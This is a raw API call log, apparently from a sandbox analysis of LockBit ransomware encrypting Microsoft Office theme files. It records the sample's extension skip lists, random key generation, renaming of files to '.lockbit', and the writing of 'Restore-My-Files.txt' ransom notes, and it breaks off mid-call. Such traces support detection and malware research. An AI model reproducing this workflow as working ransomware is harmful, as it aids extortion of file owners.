1 [0193.969] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0193.969] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0193.970] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0193.970] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0193.970] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0193.970] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0193.970] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0193.970] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0193.970] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Adjacency.eftx") returned 1 [0193.970] lstrcmpiW (lpString1="ntldr", lpString2="Adjacency.eftx") returned 1 [0193.970] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Adjacency.eftx") returned 1 [0193.970] lstrcmpiW (lpString1="bootsect.bak", lpString2="Adjacency.eftx") returned 1 [0193.970] lstrcmpiW (lpString1="autorun.inf", lpString2="Adjacency.eftx") returned 1 [0193.970] lstrcmpiW (lpString1="thumbs.db", lpString2="Adjacency.eftx") returned 1 [0193.970] lstrcmpiW (lpString1="iconcache.db", lpString2="Adjacency.eftx") returned 1 [0193.970] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0193.970] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned=".eftx" [0193.970] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0193.970] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0193.970] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0193.970] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0193.970] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0193.970] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0193.970] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0193.970] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0193.970] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0193.970] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0193.971] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0193.971] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0193.971] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0193.971] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0193.971] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0193.971] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0193.971] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx.lockbit") returned 90 [0193.971] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0193.974] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.974] malloc (_Size=0x40068) returned 0x1ff1e60 [0193.974] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=21089) returned 1 [0193.974] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0193.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0193.975] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.977] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.977] malloc (_Size=0xca) returned 0x1fa2ed8 [0193.977] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xca, FileInformationClass=0xa) returned 0x0 [0193.979] free (_Block=0x1fa2ed8) [0193.979] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0193.979] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0193.979] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0193.981] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.981] malloc (_Size=0x40068) returned 0x3d70450 [0193.981] WriteFile (in: hFile=0x170, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0193.982] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x655c2c00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5943160, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x655c2c00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x6ae5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Angles.eftx", cAlternateFileName="ANGLES~1.EFT")) returned 1 [0193.982] lstrcmpiW (lpString1=".", lpString2="Angles.eftx") returned -1 [0193.982] lstrcmpiW (lpString1="..", lpString2="Angles.eftx") returned -1 [0193.982] PathFindExtensionW (pszPath="Angles.eftx") returned=".eftx" [0193.982] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0193.982] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0193.983] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0193.983] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0193.983] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0193.983] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0193.983] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0193.983] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0193.983] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0193.983] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0193.983] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0193.984] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0193.984] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0193.984] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0193.984] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0193.984] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0193.985] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0193.985] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Angles.eftx") returned 1 [0193.985] lstrcmpiW (lpString1="ntldr", lpString2="Angles.eftx") returned 1 [0193.985] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Angles.eftx") returned 1 [0193.985] lstrcmpiW (lpString1="bootsect.bak", lpString2="Angles.eftx") returned 1 [0193.985] lstrcmpiW (lpString1="autorun.inf", lpString2="Angles.eftx") returned 1 [0193.985] lstrcmpiW (lpString1="thumbs.db", lpString2="Angles.eftx") returned 1 [0193.985] lstrcmpiW (lpString1="iconcache.db", lpString2="Angles.eftx") returned 1 [0193.985] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0193.985] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned=".eftx" [0193.985] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0193.985] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0193.985] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0193.985] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0193.985] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0193.985] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0193.985] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0193.985] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0193.985] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0193.985] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0193.985] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0193.985] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0193.986] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0193.986] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0193.986] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0193.986] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0193.986] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx.lockbit") returned 87 [0193.986] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0193.987] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.987] malloc (_Size=0x40068) returned 0x3f70048 [0193.988] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=27365) returned 1 [0193.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.988] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0193.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0193.989] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0194.004] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.004] malloc (_Size=0xc4) returned 0x1fa2ed8 [0194.004] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0194.005] free (_Block=0x1fa2ed8) [0194.005] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.005] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.005] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.005] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83b00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5943160, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x83b00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x354c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apex.eftx", cAlternateFileName="APEX~1.EFT")) returned 1 [0194.005] lstrcmpiW (lpString1=".", lpString2="Apex.eftx") returned -1 [0194.005] lstrcmpiW (lpString1="..", lpString2="Apex.eftx") returned -1 [0194.005] PathFindExtensionW (pszPath="Apex.eftx") returned=".eftx" [0194.005] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.005] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.005] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.005] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.005] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.005] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.006] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.006] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.006] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.006] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.006] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.006] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.006] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.006] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.006] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.007] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.007] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Apex.eftx") returned 1 [0194.007] lstrcmpiW (lpString1="ntldr", lpString2="Apex.eftx") returned 1 [0194.007] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Apex.eftx") returned 1 [0194.007] lstrcmpiW (lpString1="bootsect.bak", lpString2="Apex.eftx") returned 1 [0194.007] lstrcmpiW (lpString1="autorun.inf", lpString2="Apex.eftx") returned 1 [0194.007] lstrcmpiW (lpString1="thumbs.db", lpString2="Apex.eftx") returned 1 [0194.007] lstrcmpiW (lpString1="iconcache.db", lpString2="Apex.eftx") returned 1 [0194.007] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.007] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned=".eftx" [0194.008] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.008] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.008] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.008] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.008] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.008] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.008] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.008] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.008] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.008] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.008] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.008] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.008] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.008] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.008] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.008] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.008] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.008] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.008] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.008] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.009] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.009] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.009] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.009] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.009] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.009] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.009] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.009] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.009] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx.lockbit") returned 85 [0194.009] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.010] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.010] malloc (_Size=0x40068) returned 0x3df0008 [0194.010] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=218310) returned 1 [0194.010] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.011] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.011] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.011] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.011] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.014] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.014] malloc (_Size=0xc0) returned 0x1fa2ed8 [0194.014] NtSetInformationFile (FileHandle=0x2a8, 